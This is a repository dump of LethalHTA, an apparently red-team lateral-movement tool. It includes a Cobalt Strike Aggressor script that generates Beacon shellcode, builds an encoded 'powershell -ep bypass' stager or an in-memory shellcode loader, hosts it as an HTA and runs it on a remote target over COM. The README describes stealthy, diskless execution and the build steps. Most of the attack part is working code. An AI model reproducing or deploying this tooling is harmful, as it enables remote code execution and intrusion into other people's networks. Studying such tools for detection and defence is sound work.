├── .gitattributes ├── .gitignore ├── CobaltStrike ├── LethalHTA.cna ├── LethalHTADotNet.exe ├── README.md ├── SCLoader.bin ├── SCLoader │ ├── SCLoader.sln │ └── SCLoader │ │ ├── Properties │ │ └── AssemblyInfo.cs │ │ ├── SCLoader.cs │ │ └── SCLoader.csproj ├── dotNetJScriptTemplate.hta └── figures │ ├── lethalhta-deploy-stageless.png │ ├── lethalhta-menu-staged.png │ ├── lethalhta-menu-stageless-session-0.png │ ├── lethalhta-menu-stageless-winver.png │ ├── lethalhta-menu-stageless.png │ ├── lethalhta-menu.png │ ├── lethalhta-stageless-flow.png │ └── lethalhta-stageless-flow.xml ├── DISCLAIMER.md ├── DotNet ├── .gitattributes ├── .gitignore ├── LethalHTADotNet.sln ├── LethalHTADotNet │ ├── App.config │ ├── ComUtils.cs │ ├── FakeObject.cs │ ├── Interfaces.cs │ ├── LethalHTA.cs │ ├── LethalHTADotNet.csproj │ └── Properties │ │ └── AssemblyInfo.cs └── README.md ├── LICENSE ├── Native ├── LethalHTA.sln ├── LethalHTA │ ├── LethalHTA.cpp │ ├── LethalHTA.vcxproj │ ├── LethalHTA.vcxproj.filters │ ├── stdafx.cpp │ ├── stdafx.h │ └── targetver.h └── README.md └── README.md /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 
11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 
53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | 4 | # User-specific files 5 | *.suo 6 | *.user 7 | *.userosscache 8 | *.sln.docstates 9 | 10 | # User-specific files (MonoDevelop/Xamarin Studio) 11 | *.userprefs 12 | 13 | # Build results 14 | [Dd]ebug/ 15 | [Dd]ebugPublic/ 16 | [Rr]elease/ 17 | [Rr]eleases/ 18 | x64/ 19 | x86/ 20 | bld/ 21 | [Bb]in/ 22 | [Oo]bj/ 23 | [Ll]og/ 24 | 25 | # Visual Studio 2015 cache/options directory 26 | .vs/ 27 | # Uncomment if you have tasks that create the project's static files in wwwroot 28 | #wwwroot/ 29 | 30 | # MSTest test Results 31 | [Tt]est[Rr]esult*/ 32 | [Bb]uild[Ll]og.* 33 | 34 | # NUNIT 35 | *.VisualState.xml 36 | TestResult.xml 37 | 38 | # Build Results of an ATL Project 39 | [Dd]ebugPS/ 40 | [Rr]eleasePS/ 41 | dlldata.c 42 | 43 | # DNX 44 | project.lock.json 45 | project.fragment.lock.json 46 | artifacts/ 47 | 48 | *_i.c 49 | *_p.c 50 | *_i.h 51 | *.ilk 52 | *.meta 53 | *.obj 54 | *.pch 55 | *.pdb 56 | *.pgc 57 | *.pgd 58 | *.rsp 59 | *.sbr 60 | *.tlb 61 | *.tli 62 | *.tlh 63 | *.tmp 64 | *.tmp_proj 65 | *.log 66 | *.vspscc 67 | *.vssscc 68 | .builds 69 | *.pidb 70 | *.svclog 71 | *.scc 72 | 73 | # Chutzpah Test files 74 | _Chutzpah* 75 | 76 | # Visual C++ cache files 77 | ipch/ 78 | *.aps 79 | *.ncb 80 | *.opendb 81 | *.opensdf 82 | *.sdf 83 | *.cachefile 84 | *.VC.db 85 | *.VC.VC.opendb 86 | 87 | 
# Visual Studio profiler 88 | *.psess 89 | *.vsp 90 | *.vspx 91 | *.sap 92 | 93 | # TFS 2012 Local Workspace 94 | $tf/ 95 | 96 | # Guidance Automation Toolkit 97 | *.gpState 98 | 99 | # ReSharper is a .NET coding add-in 100 | _ReSharper*/ 101 | *.[Rr]e[Ss]harper 102 | *.DotSettings.user 103 | 104 | # JustCode is a .NET coding add-in 105 | .JustCode 106 | 107 | # TeamCity is a build add-in 108 | _TeamCity* 109 | 110 | # DotCover is a Code Coverage Tool 111 | *.dotCover 112 | 113 | # NCrunch 114 | _NCrunch_* 115 | .*crunch*.local.xml 116 | nCrunchTemp_* 117 | 118 | # MightyMoose 119 | *.mm.* 120 | AutoTest.Net/ 121 | 122 | # Web workbench (sass) 123 | .sass-cache/ 124 | 125 | # Installshield output folder 126 | [Ee]xpress/ 127 | 128 | # DocProject is a documentation generator add-in 129 | DocProject/buildhelp/ 130 | DocProject/Help/*.HxT 131 | DocProject/Help/*.HxC 132 | DocProject/Help/*.hhc 133 | DocProject/Help/*.hhk 134 | DocProject/Help/*.hhp 135 | DocProject/Help/Html2 136 | DocProject/Help/html 137 | 138 | # Click-Once directory 139 | publish/ 140 | 141 | # Publish Web Output 142 | *.[Pp]ublish.xml 143 | *.azurePubxml 144 | # TODO: Comment the next line if you want to checkin your web deploy settings 145 | # but database connection strings (with potential passwords) will be unencrypted 146 | #*.pubxml 147 | *.publishproj 148 | 149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 150 | # checkin your Azure Web App publish settings, but sensitive information contained 151 | # in these scripts will be unencrypted 152 | PublishScripts/ 153 | 154 | # NuGet Packages 155 | *.nupkg 156 | # The packages folder can be ignored because of Package Restore 157 | **/packages/* 158 | # except build/, which is used as an MSBuild target. 
159 | !**/packages/build/ 160 | # Uncomment if necessary however generally it will be regenerated when needed 161 | #!**/packages/repositories.config 162 | # NuGet v3's project.json files produces more ignoreable files 163 | *.nuget.props 164 | *.nuget.targets 165 | 166 | # Microsoft Azure Build Output 167 | csx/ 168 | *.build.csdef 169 | 170 | # Microsoft Azure Emulator 171 | ecf/ 172 | rcf/ 173 | 174 | # Windows Store app package directories and files 175 | AppPackages/ 176 | BundleArtifacts/ 177 | Package.StoreAssociation.xml 178 | _pkginfo.txt 179 | 180 | # Visual Studio cache files 181 | # files ending in .cache can be ignored 182 | *.[Cc]ache 183 | # but keep track of directories ending in .cache 184 | !*.[Cc]ache/ 185 | 186 | # Others 187 | ClientBin/ 188 | ~$* 189 | *~ 190 | *.dbmdl 191 | *.dbproj.schemaview 192 | *.jfm 193 | *.pfx 194 | *.publishsettings 195 | node_modules/ 196 | orleans.codegen.cs 197 | 198 | # Since there are multiple workflows, uncomment next line to ignore bower_components 199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 200 | #bower_components/ 201 | 202 | # RIA/Silverlight projects 203 | Generated_Code/ 204 | 205 | # Backup & report files from converting an old project file 206 | # to a newer Visual Studio version. 
Backup files are not needed, 207 | # because we have git ;-) 208 | _UpgradeReport_Files/ 209 | Backup*/ 210 | UpgradeLog*.XML 211 | UpgradeLog*.htm 212 | 213 | # SQL Server files 214 | *.mdf 215 | *.ldf 216 | 217 | # Business Intelligence projects 218 | *.rdl.data 219 | *.bim.layout 220 | *.bim_*.settings 221 | 222 | # Microsoft Fakes 223 | FakesAssemblies/ 224 | 225 | # GhostDoc plugin setting file 226 | *.GhostDoc.xml 227 | 228 | # Node.js Tools for Visual Studio 229 | .ntvs_analysis.dat 230 | 231 | # Visual Studio 6 build log 232 | *.plg 233 | 234 | # Visual Studio 6 workspace options file 235 | *.opt 236 | 237 | # Visual Studio LightSwitch build output 238 | **/*.HTMLClient/GeneratedArtifacts 239 | **/*.DesktopClient/GeneratedArtifacts 240 | **/*.DesktopClient/ModelManifest.xml 241 | **/*.Server/GeneratedArtifacts 242 | **/*.Server/ModelManifest.xml 243 | _Pvt_Extensions 244 | 245 | # Paket dependency manager 246 | .paket/paket.exe 247 | paket-files/ 248 | 249 | # FAKE - F# Make 250 | .fake/ 251 | 252 | # JetBrains Rider 253 | .idea/ 254 | *.sln.iml 255 | 256 | # CodeRush 257 | .cr/ 258 | 259 | # Python Tools for Visual Studio (PTVS) 260 | __pycache__/ 261 | *.pyc -------------------------------------------------------------------------------- /CobaltStrike/LethalHTA.cna: -------------------------------------------------------------------------------- 1 | # 2 | # LethalHTADotNet integration for Cobalt Strike 3 | # 4 | # (c) 2018 Code White GmbH - Markus Piéton 5 | # 6 | # CNA-Script is inspired by rsmudge/stagelessweb.cna 7 | # (https://gist.github.com/rsmudge/629bd4ddce3bbbca1f8c16378a6a419c) 8 | # 9 | debug(5); 10 | 11 | # define our top-level menubar 12 | menubar("&LethalHTA", "lethalhta"); 13 | 14 | global('$HTA_TEMPLATE'); 15 | 16 | $LETHAL_HTA_URL = "https://codewhitesec.blogspot.com/2018/07/lethalhta.html"; 17 | 18 | $PATH_TO_SCLOADER = script_resource("SCLoader.bin"); 19 | $PATH_TO_DOTNETJSCRIPT_TEMPLATE = script_resource("dotNetJScriptTemplate.hta"); 
20 | $PATH_TO_LETHALHTPDOTNET = script_resource("LethalHTADotNet.exe"); 21 | 22 | $HTA_TEMPLATE = ''; 23 | 24 | # setup our stageless HTA attack 25 | sub setup_stageless { 26 | local('%options $target $ssl $bid $hta $shellcode $readytouse $lhtadotnet $url $handle $scloader $payload $payloadx86 $index_payload_x86 $payloadx64 $index_payload_x64'); 27 | 28 | %options = $3; 29 | 30 | $target = %options["target"]; 31 | $bid = %options["bid"]; 32 | 33 | if ($target eq "") { 34 | blog($bid, , "Target not specified!"); 35 | return; 36 | } 37 | 38 | ############################################################### 39 | ## Clean-up already registered content and redirects 40 | 41 | site_kill(%options["port"], %options["uri"]); 42 | 43 | if (%options["rdr"] eq "true") { 44 | brportfwd_stop($bid, %options["rdrport"]); 45 | } 46 | 47 | ############################################################### 48 | ## Read SCLoader.bin 49 | 50 | # read in the executable template 51 | $handle = openf($PATH_TO_SCLOADER); 52 | $scloader = readb($handle, -1); 53 | closef($handle); 54 | 55 | # find the location of our shellcode in SCLoader 56 | $index_payload_x86 = indexOf($scloader, "\x01\x02\x03\x04\x05\x06\x07"); 57 | $index_payload_x64 = indexOf($scloader, "\x07\x06\x05\x04\x03\x02\x01"); 58 | 59 | ############################################################### 60 | ## Generate Payloads (x86 and x64 stageless) 61 | 62 | # generate our stageless x86 raw-payload. We're going to make *this* function 63 | # the callback for this call. That's why we yield after. 64 | artifact_stageless(%options["listener"], "raw", "x86", %options["proxy"], $this); 65 | yield; 66 | 67 | # this function is now resumed after &artifact_stageless finished. $1 is our payload. 68 | $payloadx86 = gzip($1); 69 | 70 | # generate our stageless x64 raw-payload. We're going to make *this* function 71 | # the callback for this call. That's why we yield after. 
72 | artifact_stageless(%options["listener"], "raw", "x64", %options["proxy"], $this); 73 | yield; 74 | 75 | # this function is now resumed after &artifact_stageless finished. $1 is our payload. 76 | $payloadx64 = gzip($1); 77 | 78 | # Replace dummy bytes inside SCLoader with our shellcode 79 | $payload = replaceAt($scloader, "$[204800]payloadx86", $index_payload_x86); 80 | $payload = replaceAt($payload, "$[204800]payloadx64", $index_payload_x64); 81 | $payload = base64_encode($payload); 82 | 83 | ############################################################### 84 | ## Create HTA String 85 | 86 | # read in the executable template 87 | $handle = openf($PATH_TO_DOTNETJSCRIPT_TEMPLATE); 88 | $hta = readb($handle, -1); 89 | closef($handle); 90 | 91 | $hta = strrep($hta, 'REPLACETHISWITHSERIALIZEDOBJECT', $payload); 92 | 93 | ############################################################### 94 | ## Host the HTA file 95 | 96 | $ssl = iff(%options["ssl"] eq "true", true, false); 97 | 98 | # host the payload! 99 | $url = site_host(%options["host"], %options["port"], %options["uri"], $hta, "text/plain", "LethalHTA \(.NET - stageless - x86/x64\)", $ssl); 100 | 101 | if ($url eq "") { 102 | blog($bid, , "Error hosting content!"); 103 | return; 104 | } 105 | 106 | ############################################################### 107 | ## Beacon Redirect 108 | 109 | # check if we need to set-up a Beacon redirect 110 | if (%options["rdr"] eq "true") { 111 | $url = iff($ssl, "https", "http") . "://" . binfo($bid, "internal") . ":" . %options["port"] . %options["uri"]; 112 | brportfwd($bid, %options["rdrport"], %options["host"], %options["port"]); 113 | } 114 | 115 | ############################################################### 116 | ## Go Go Go! 117 | blog($bid, , "USING: execute-assembly " . $PATH_TO_LETHALHTPDOTNET . 
" \"$target\" \"$url\""); 118 | bexecute_assembly($bid, $PATH_TO_LETHALHTPDOTNET, "\"$target\" \"$url\""); 119 | } 120 | 121 | # 122 | sub testcmd { 123 | local('%options $bid $meta $key $value'); 124 | %options = $3; 125 | 126 | $meta = bdata(%options["bid"]); 127 | 128 | foreach $key => $value ($meta) { 129 | println("$[20]key : $value"); 130 | } 131 | } 132 | 133 | # 134 | sub setup_powershell { 135 | local('%options $target $ssl $bid $hta $shellcode $readytouse $lhtadotnet $url'); 136 | %options = $3; 137 | 138 | $target = %options["target"]; 139 | $bid = %options["bid"]; 140 | 141 | if ($target eq "") { 142 | blog($bid, , "Target not specified!"); 143 | return; 144 | } 145 | 146 | ############################################################### 147 | ## Clean-up already registered content and redirects 148 | 149 | site_kill(%options["port"], %options["uri"]); 150 | 151 | if (%options["rdr"] eq "true") { 152 | brportfwd_stop($bid, %options["rdrport"]); 153 | } 154 | 155 | ############################################################### 156 | ## Generate Payload 157 | 158 | $shellcode = shellcode(%options["listener"], false, "x86"); 159 | $readytouse = powershell_encode_stager($shellcode); 160 | 161 | ############################################################### 162 | ## Create HTA String 163 | 164 | $hta = strrep($HTA_TEMPLATE, 'REPLACEMEORELSE', "powershell -ep bypass -enc $readytouse"); 165 | 166 | ############################################################### 167 | ## Host the HTA file 168 | 169 | $ssl = iff(%options["ssl"] eq "true", true, false); 170 | 171 | # host the payload! 
172 | $url = site_host(%options["host"], %options["port"], %options["uri"], $hta, "text/plain", "LethalHTA \(powershell - staged - x86\)", $ssl); 173 | 174 | if ($url eq "") { 175 | blog($bid, , "Error hosting content!"); 176 | return; 177 | } 178 | 179 | ############################################################### 180 | ## Beacon Redirect 181 | 182 | # check if we need to set-up a Beacon redirect 183 | if (%options["rdr"] eq "true") { 184 | $url = iff($ssl, "https", "http") . "://" . binfo($bid, "internal") . ":" . %options["port"] . %options["uri"]; 185 | brportfwd($bid, %options["rdrport"], %options["host"], %options["port"]); 186 | } 187 | 188 | ############################################################### 189 | ## Go Go Go! 190 | blog($bid, , "USING: execute-assembly " . $PATH_TO_LETHALHTPDOTNET . " \"$target\" \"$url\""); 191 | bexecute_assembly($bid, $PATH_TO_LETHALHTPDOTNET, "\"$target\" \"$url\""); 192 | } 193 | 194 | sub show_dialog { 195 | local('$dialog %defaults'); 196 | 197 | # setup our defaults 198 | %defaults["target"] = ""; 199 | %defaults["uri"] = "/a"; 200 | %defaults["host"] = localip(); 201 | %defaults["port"] = 80; 202 | %defaults["proxy"] = ""; 203 | %defaults["rdr"] = false; 204 | %defaults["rdrport"] = 80; 205 | %defaults["ssl"] = false; 206 | 207 | # create our dialog 208 | $dialog = dialog($1, %defaults, $3); 209 | dialog_description($dialog, $2); 210 | drow_beacon($dialog, "bid", "Session: "); 211 | drow_listener_stage($dialog, "listener", "Listener: "); 212 | drow_text($dialog, "target", "Target (IP/Hostname): "); 213 | drow_text($dialog, "uri", "URI Path: ", 20); 214 | drow_text($dialog, "host", "HTTP(S) Host: "); 215 | drow_text($dialog, "port", "HTTP(S) Port: "); 216 | drow_checkbox($dialog, "ssl", "Use SSL/TLS: "); 217 | if (-istrue $4) { 218 | drow_proxyserver($dialog, "proxy", "Proxy: "); 219 | drow_checkbox($dialog, "rdr", "Redirect via Beacon: ", "Use Beacon as the HTTP Host (via port forwarding)"); 220 | 
drow_text($dialog, "rdrport", "HTTP Redirect-Port: ", "Ignored if 'Redirect via Beacon' isn't used."); 221 | } 222 | dbutton_action($dialog, "Launch"); 223 | dbutton_help($dialog, $LETHAL_HTA_URL); 224 | 225 | # show our dialog 226 | dialog_show($dialog); 227 | } 228 | 229 | # 230 | popup lethalhta { 231 | item "HTA &PowerShell Delivery (staged - x86)" { 232 | show_dialog("PowerShell LethalHTA (staged)", "A staged PowerShell version of the LethalHTA attack.", &setup_powershell); 233 | } 234 | 235 | item "HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)" { 236 | show_dialog(".NET LethalHTA (stageless)", "A stageless .NET version of the LethalHTA attack using DotNetToJScript.", &setup_stageless, true); 237 | } 238 | } 239 | -------------------------------------------------------------------------------- /CobaltStrike/LethalHTADotNet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/LethalHTADotNet.exe -------------------------------------------------------------------------------- /CobaltStrike/README.md: -------------------------------------------------------------------------------- 1 | # LethalHTA.NET CobaltStrike Integration 2 | 3 | The CobaltStrike Aggressor Script *lethalhta.cna* provides two lateral-movement options that use the LethalHTA attack vector. 4 | 5 | * *HTA PowerShell Delivery (staged - x86)* and 6 | * *HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic)* 7 | 8 | ![LethalHTA Menu](./figures/lethalhta-menu.png) 9 | 10 | ## HTA PowerShell Delivery (staged - x86) 11 | 12 | The *HTA PowerShell Delivery* methods allows to execute a PowerShell based, staged Beacon on the target system via HTA over COM using the *LethalHTADotNet* tool. 
13 | 14 | ![LethalHTA PowerShell Dialog](./figures/lethalhta-menu-staged.png) 15 | 16 | *Hint:* Since the PowerShell beacon is staged, the target systems need to be able to reach both the HTTP(S) host and the TeamServer (in most cases these are the same). 17 | 18 | ## HTA .NET In-Memory Delivery (stageless - x86/x64 dynamic) 19 | 20 | The *HTA .NET Delivery* provides far more flexibility in terms of payload delivery and stealth. Not only is it possible to tunnel the HTA delivery/retrieval process through the Beacon systems, it is also possible to specify a proxy server. If the target system is not able to reach the TeamServer or any other Internet-connected system, an *SMB* listener can be used. This bootstraps the SMB listener on the target, and the operator is then able to connect to the target by linking (`link `) the two beacons. 21 | 22 | In addition, due to the techniques used, everything is done inside the *mshta.exe* process without ever touching disk or creating additional processes. What remains observable on the target is the *mshta.exe* instance created via COM, its HTTP(S) request for the HTA file, and the .NET Framework being loaded inside that process. 23 | 24 | ![LethalHTA .NET Delivery Dialog](./figures/lethalhta-menu-stageless.png) 25 | 26 | ### Delivery Overview 27 | 28 | The combination of two techniques, in addition to the HTA attack vector, is needed to execute everything in-memory. Utilizing the excellent [*DotNetToJScript*](https://github.com/tyranid/DotNetToJScript) tool by James Forshaw, we are able to load a small .NET class (*SCLoader*) that dynamically determines the process's architecture (x86 or x64) and then executes the included stageless Beacon shellcode. 29 | 30 | ![LethalHTA .NET Delivery Flow](./figures/lethalhta-stageless-flow.png) 31 | 32 | As shown in the figure above, the HTA object is created on the target system via COM (step 1). The target then retrieves the HTA file via HTTP (step 2) and executes the included JScript (step 3) inside *mshta.exe*. Steps 4 - 7 are the normal *DotNetToJScript* execution mode.
The class loaded by step 7 (*SCLoader*) determines the current process's architecture (step 8), decompresses the matching shellcode (step 9) and executes it in the same process by creating a new Thread (step 10). 33 | 34 | As the required 32- and 64-bit shellcode of the Beacons needs to be generated on-the-fly by the CobaltStrike Client, the output of *DotNetToJScript* needs to be modified so that the Aggressor Script is able to inject the right shellcode into SCLoader before delivery. The SCLoader output generated by *DotNetToJScript* needs to be split into two files: a template HTA file (*dotNetJScriptTemplate.hta*) that contains the code to load the .NET Framework and our *SCLoader* class, and a second file, *SCLoader.bin*, containing the Base64-decoded content of the variable *serialized_obj* of *DotNetToJScript*. 35 | 36 | The following command line can be used to create the output file *SCLoaderOuput.js*. Afterwards, the content of *serialized_obj* needs to be Base64-decoded and stored in the file *SCLoader.bin*.
37 | 38 | DotNetToJScript.exe -d -l JScript -v Auto -o SCLoaderOuput.js -c SCLoader.SCLoader SCLoader\SCLoader\bin\Release\SCLoader.dll 39 | -------------------------------------------------------------------------------- /CobaltStrike/SCLoader.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/SCLoader.bin -------------------------------------------------------------------------------- /CobaltStrike/SCLoader/SCLoader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.27428.2037 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SCLoader", "SCLoader\SCLoader.csproj", "{784CDE17-FF0F-4E43-911A-19119E89C43F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {784CDE17-FF0F-4E43-911A-19119E89C43F}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {D424AA5C-32F3-4CBA-9896-6636100E90BB} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /CobaltStrike/SCLoader/SCLoader/Properties/AssemblyInfo.cs: 
-------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SCLoader")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SCLoader")] 13 | [assembly: AssemblyCopyright("Copyright © 2018")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("784cde17-ff0f-4e43-911a-19119e89c43f")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /CobaltStrike/SCLoader/SCLoader/SCLoader.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {784CDE17-FF0F-4E43-911A-19119E89C43F} 8 | Library 9 | Properties 10 | SCLoader 11 | SCLoader 12 | v2.0 13 | 512 14 | 15 | 16 | 17 | 
true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | false 25 | 26 | 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | false 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /CobaltStrike/dotNetJScriptTemplate.hta: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-deploy-stageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-deploy-stageless.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu-staged.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-staged.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu-stageless-session-0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-stageless-session-0.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu-stageless-winver.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-stageless-winver.png -------------------------------------------------------------------------------- 
/CobaltStrike/figures/lethalhta-menu-stageless.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu-stageless.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-menu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-menu.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-stageless-flow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/codewhitesec/LethalHTA/5602402db6477a6a1225df761e9be2749ab209f2/CobaltStrike/figures/lethalhta-stageless-flow.png -------------------------------------------------------------------------------- /CobaltStrike/figures/lethalhta-stageless-flow.xml: -------------------------------------------------------------------------------- 1 | 
7V1dc5s4FP01nmkfkgGJz8f4I+3utLudcXb2WTayzQQjL+Ak7a9fCRAGJGKIAWPXzkNsQQS69+iec6+EM4KT7duXAO0234mDvRFQnLcRnI4AUCGw6S/W8jNpAUBRkpZ14DrpWYeGufsLp438tL3r4LBwYkSIF7m7YuOS+D5eRoU2FATktXjainjFq+7QGgsN8yXyxNZ/XSfaJK2Wrhzav2J3veFXVvn4Fmj5vA7I3k+vNwJwFb+Sw1vE+0rPDzfIIa+5JjgbwUlASJS8275NsMeMy82W/N1jxdHsvgPsR3X+ACBlZcOFvjQhXlnYvEt7eEHeHvMhGB7ta+y4L+yGo5+pkYz/9uwuxxF+i+6Q5679EXygZ3h4FR2O0nfr9HfcyyIot9Cbi7vmraBwFeC5Pn03DqOAPGfOoDhhNxRQ37uEXncakj07MN5EW48dp29XrudNiEcC+tkncScr4kcp2FSYfuanUE8p8Yu2p6OZLqkVcZBdPXfqw0yjMM/uN29wbkEcUMvkmlIHfMFki6PgJz2FH7VTMKSz5U5Lp8/rAXp8YmzyqNPT81CK9nXW9cHj9E3qdDkADIm/Sx5geN7VH2c2K9GC96C8P36zNH5gCuPPJkzeALp++viFCQCOGySe39hJcfa6cSM836ElO/pKA2IRhkXopEAsobmEVoqvR2BDdXYcso/xSwbZdYAcFx9OTq/Mm6e5yYNRyKYe86RLY+BD2lVE2FCyCKVK0W5UoED09lm8CQVvqoI7WQCr4TNJPBGMXjbh1nUcdhkpSHKuhco7rj3F6PxocYap5r0uTDFN4hPup1Z9olqVHLNRpRTDLHMXxqZiDKMauzeRYb4+sWN/+GGE/MhFMbYF0nlxET0pwFsSYfpm8vf3HA2xq1ewkAQj1Jmuv6af9MOnJzZlpndAqXA5oS5befF02lBoYL9egNDk8CtP8ZjCzAQ0OXDZTcKGPAi0AEFNL0BQhkDVkEBQawGCnCjfC+o0zu3Y28TRDtkn7MVc3SjelwK5o2PL0UqBXK+lMSywgIbRksYAxQigWxKJIYvKmgJOt7+qHbf/wHVeQCKU3oOttOMTCEtRWVdlk0Km/FTYgvK7Sf3+pb6uFaOgbBqK/oaG1kIQFLWQ4IHOpT4sjl+VGEAqDq2ML04yQY041IO4VxTb1qYXIO4zyAxD3fM+cu6DdZTawNV8AysPQM7rsopBEt7ZkJkzeDmPE4P6Dkd8XO//OV8G7o5dEL/h5T7R+4rrh67DpH2cDmS0s5BQUXK7Vyj4Y315ouLfkMD9RbtAfPgeWmDvBwndNK4If/+tdEI2W9pAvF4D8dL0AbYAeWnCem7mVIDEBJ2FXrVGBnVjzpzfrQrHn6kupgjuE/13eczZwMoDYE5QnXD1y5zbcBOhe8qaLIUjyAk5XSpJeezr09OPT+HnG30OlD6bw/6s9GmIWVcegbFse0LBGkdVMKobh/IlgZ